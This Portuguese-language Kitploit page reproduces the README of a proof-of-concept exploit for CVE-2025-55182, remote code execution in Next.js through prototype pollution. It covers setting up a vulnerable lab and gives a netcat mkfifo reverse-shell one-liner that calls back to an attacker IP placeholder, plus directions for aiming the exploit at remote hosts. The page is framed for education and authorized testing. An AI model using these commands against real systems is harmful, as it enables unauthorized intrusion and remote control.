Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell-CVE-2025-55182 — Prova de conceito de exploit para CVE-2025-55182 demonstrando execução remota de código no Next.js via poluição de protótipo. Inclui um laboratório vulnerável pré-configurado para testes autorizados e geração de shell reversa. | Kitploit
Ferramentas/GitHubGitHub/rahul-securify/react2shell-cve-2025-55182
Geração de PayloadsExploraçãoExploração de Aplicações WebCTFAprendizado e EducaçãoLabs e Prática
GitHubrahul-securify/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

Prova de conceito de exploit para CVE-2025-55182 demonstrando execução remota de código no Next.js via poluição de protótipo. Inclui um laboratório vulnerável pré-configurado para testes autorizados e geração de shell reversa.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 8 mesesAinda não revisado

React2Shell CVE-2025-55182

Um exploit de prova de conceito demonstrando uma vulnerabilidade de execução remota de código em aplicações Next.js através de poluição de protótipo no pipeline de renderização de componentes React do servidor.

⚠️ Aviso

Esta ferramenta é apenas para fins educacionais e testes autorizados. O uso não autorizado contra sistemas que você não possui ou não tem permissão para testar é ilegal.

📋 Pré-requisitos

  • Node.js (v16 ou superior)
  • Python 3.6+
  • netcat (para shells reversas)
  • Uma aplicação Next.js vulnerável (incluída neste repositório)

🚀 Início Rápido

Opção 1: Usar Laboratório Pré-configurado

1. Clone o Repositório

root@kitploit:~
git clone https://github.com/securifyai/React2Shell-CVE-2025-55182.git
cd React2Shell-CVE-2025-55182

Opção 2: Criar Servidor do Zero

root@kitploit:~
# Crie uma nova app Next.js com a versão vulnerável
npm create [email protected] react2shell-lab
# Aceite todos os padrões quando solicitado
cd react2shell-lab

Nota: O laboratório pré-configurado já inclui o código vulnerável necessário. Se estiver criando do zero, você precisará adicionar manualmente os componentes vulneráveis.

2. Instale as Dependências

root@kitploit:~
cd react2shell-lab
npm install

3. Inicie o Servidor Vulnerável

No terminal 1:

root@kitploit:~
npm run dev

O servidor deve iniciar em http://localhost:3000

🔧 Exploração

Execução Básica de Comandos

  1. O repositório inclui um arquivo exploit.py que demonstra a vulnerabilidade. Edite a variável COMMAND no arquivo para o comando desejado:

    root@kitploit:~
    COMMAND = 'whoami'  # Altere para qualquer comando que queira executar
    
  2. Execute o exploit:

    root@kitploit:~
    python3 exploit.py
    

Shell Reversa

  1. Configure um listener netcat em um novo terminal:

    root@kitploit:~
    nc -nvlp 4444
    
  2. Edite exploit.py e atualize o comando para seu payload de shell reversa:

    root@kitploit:~
    COMMAND = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc SEU_IP 4444 >/tmp/f'
    

    Substitua SEU_IP pelo endereço IP da sua máquina local.

  3. Execute o exploit:

    root@kitploit:~
    python3 exploit.py
    

🛠️ Uso Avançado

Testando Alvos Remotos

Edite a variável HOST no script do exploit para mirar servidores remotos:

root@kitploit:~
HOST = 'ip-do-alvo'  # Substitua pelo IP do alvo
PORT = 3000  # Porta padrão do Next.js

Comandos Comuns

  • Listar conteúdo do diretório: ls -la
  • Obter informações do sistema: uname -a
  • Obter usuário atual: whoami
  • Obter informações de rede: ifconfig ou ip a

🔍 Solução de Problemas

  • Conexão recusada: Certifique-se de que o servidor alvo está rodando e acessível
  • Comando não encontrado: O sistema alvo pode não ter certos binários instalados
  • Sem saída: O comando pode ter sido executado mas não produziu saída

📚 Referências

  • CVE-2025-55182
  • Avisos de Segurança do Next.js
  • Poluição de Protótipo em JavaScript

📄 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.

Esta versão solicita entrada do usuário para IP e porta do alvo remoto e do atacante. O corpo da postagem (body_parts) também foi ligeiramente reduzido nesta versão.

Fontes:

https://www.averlon.ai/blog/react2shell-cve-2025-55182-explained

https://tryhackme.com/room/react2shellcve202555182

Baixar ferramenta